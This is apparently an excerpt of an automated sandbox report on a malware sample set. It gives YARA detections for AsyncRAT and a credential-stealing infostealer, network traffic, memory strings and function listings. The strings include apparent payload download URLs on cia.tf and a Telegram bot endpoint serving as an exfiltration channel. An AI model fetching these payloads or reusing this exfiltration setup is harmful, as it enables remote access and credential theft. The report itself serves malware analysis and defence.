                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3136475457.00000000068E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: Ref#2056119.exe, 00000000.00000002.2030087377.0000000001102000.00000004.00000020.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2191181764.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3110886704.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2304145044.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001163000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3110706904.0000000001181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Liphmahu.exe, 00000004.00000002.2209273870.00000000060D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004163000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Ref#2056119.exe, 00000005.00000002.3115674716.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 0000000C.00000002.3116067900.0000000002F11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf
                      Source: Liphmahu.exe, 00000004.00000002.2192763422.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/417440cce6502c1c57308172e9826dec.mp4HI
                      Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI
                      Source: ishon.exe, 00000007.00000002.2307141750.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/fef4b8b5d2edef77f163d9b5ed69e2ea.vdfHI=
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#2056119.exe, ishon.exe.0.dr, Liphmahu.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0715F008 NtResumeThread,0_2_0715F008
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0715F002 NtResumeThread,0_2_0715F002
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8F138 NtResumeThread,4_2_05D8F138
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8F130 NtResumeThread,4_2_05D8F130
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A2E870 NtProtectVirtualMemory,4_2_06A2E870
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A2E868 NtProtectVirtualMemory,4_2_06A2E868
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2CC88 NtProtectVirtualMemory,7_2_06E2CC88
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2F140 NtResumeThread,7_2_06E2F140
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2CC81 NtProtectVirtualMemory,7_2_06E2CC81
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2F138 NtResumeThread,7_2_06E2F138
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0133CB140_2_0133CB14
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0133F3B80_2_0133F3B8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0133F3A80_2_0133F3A8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_064F00060_2_064F0006
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_070A12000_2_070A1200
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_070A22B30_2_070A22B3
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_070A22C00_2_070A22C0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_070A28400_2_070A2840
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071435E80_2_071435E8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0714B9C80_2_0714B9C8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071465AA0_2_071465AA
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071435D80_2_071435D8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071423300_2_07142330
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071423400_2_07142340
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0714CA380_2_0714CA38
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0714CA480_2_0714CA48
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0714392A0_2_0714392A
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071559B00_2_071559B0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0715A5050_2_0715A505
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071563BF0_2_071563BF
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071563D00_2_071563D0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071559A00_2_071559A0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071500400_2_07150040
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0715F8980_2_0715F898
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0715F8880_2_0715F888
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071737980_2_07173798
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071767DB0_2_071767DB
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_07174E480_2_07174E48
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0717BBD80_2_0717BBD8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0717BBC80_2_0717BBC8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0717A9D80_2_0717A9D8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0717A9E80_2_0717A9E8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_0717001D0_2_0717001D
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_071700400_2_07170040
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074300400_2_07430040
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074303670_2_07430367
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074312480_2_07431248
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074B2F300_2_074B2F30
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074BB0F00_2_074BB0F0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074B2F200_2_074B2F20
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074BE2180_2_074BE218
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074BE1B90_2_074BE1B9
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_074BB0E00_2_074BB0E0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_075A00400_2_075A0040
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 0_2_075A00130_2_075A0013
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_0091CB144_2_0091CB14
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_0091F3B84_2_0091F3B8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_0091F3A84_2_0091F3A8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D43DC84_2_05D43DC8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D4BF564_2_05D4BF56
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D433074_2_05D43307
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D43DB84_2_05D43DB8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D434424_2_05D43442
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D4CF584_2_05D4CF58
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D4CF484_2_05D4CF48
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D4338C4_2_05D4338C
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D42B484_2_05D42B48
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D42B384_2_05D42B38
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D4333B4_2_05D4333B
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D442914_2_05D44291
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D432784_2_05D43278
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D432684_2_05D43268
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D603C84_2_05D603C8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D615E04_2_05D615E0
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D606FF4_2_05D606FF
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8A4904_2_05D8A490
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D806B84_2_05D806B8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D859E04_2_05D859E0
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D898204_2_05D89820
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8A4804_2_05D8A480
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D846E84_2_05D846E8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8FE624_2_05D8FE62
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8F9D04_2_05D8F9D0
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8F9E04_2_05D8F9E0
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8A84C4_2_05D8A84C
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D898114_2_05D89811
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8BB4F4_2_05D8BB4F
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8FB6D4_2_05D8FB6D
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8FAB34_2_05D8FAB3
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8FAB64_2_05D8FAB6
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D87A544_2_05D87A54
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D8FA544_2_05D8FA54
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_05D87A604_2_05D87A60
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_067CF1604_2_067CF160
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_067C0DB04_2_067C0DB0
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_067C0DA34_2_067C0DA3
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_067C12334_2_067C1233
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_067C12D84_2_067C12D8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_067C13284_2_067C1328
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_0680B6404_2_0680B640
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06805B784_2_06805B78
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_068048A84_2_068048A8
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_068074EB4_2_068074EB
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_068012234_2_06801223
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_0680B62F4_2_0680B62F
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_068012304_2_06801230
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_068048984_2_06804898
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_068098194_2_06809819
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A2B4604_2_06A2B460
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A26C404_2_06A26C40
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A249884_2_06A24988
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A26C3A4_2_06A26C3A
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A2B4504_2_06A2B450
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A2E5F04_2_06A2E5F0
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A26DC34_2_06A26DC3
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06A2D9104_2_06A2D910
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06C7E7504_2_06C7E750
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06C600404_2_06C60040
                      Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exeCode function: 4_2_06C600074_2_06C60007
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_0129E5085_2_0129E508
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_0129D9905_2_0129D990
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_0129AA125_2_0129AA12
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_01294A985_2_01294A98
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_01293E805_2_01293E80
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_012941C85_2_012941C8
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_01294A8E5_2_01294A8E
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_01293E745_2_01293E74
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B366685_2_06B36668
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B356405_2_06B35640
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B37DF05_2_06B37DF0
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B3B2A35_2_06B3B2A3
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B3C2005_2_06B3C200
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B331005_2_06B33100
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B377105_2_06B37710
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B3E4185_2_06B3E418
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B324095_2_06B32409
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B35D5F5_2_06B35D5F
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B300405_2_06B30040
                      Source: C:\Users\user\Desktop\Ref#2056119.exeCode function: 5_2_06B300065_2_06B30006
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_017DCB147_2_017DCB14
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_017DF3B87_2_017DF3B8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_017DF3A87_2_017DF3A8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E298B07_2_06E298B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2C9D87_2_06E2C9D8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2C9787_2_06E2C978
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E298A07_2_06E298A0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2F9C17_2_06E2F9C1
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06E2F9D07_2_06E2F9D0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_073F09F87_2_073F09F8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_073F1EB87_2_073F1EB8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_073F1EAA7_2_073F1EAA
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_073F24387_2_073F2438
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074859B07_2_074859B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0748A5057_2_0748A505
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074863D07_2_074863D0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074863BF7_2_074863BF
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0748EA097_2_0748EA09
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074859A07_2_074859A0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074800407_2_07480040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074935E87_2_074935E8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0749B9C87_2_0749B9C8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074935D87_2_074935D8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074965AA7_2_074965AA
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_074923407_2_07492340
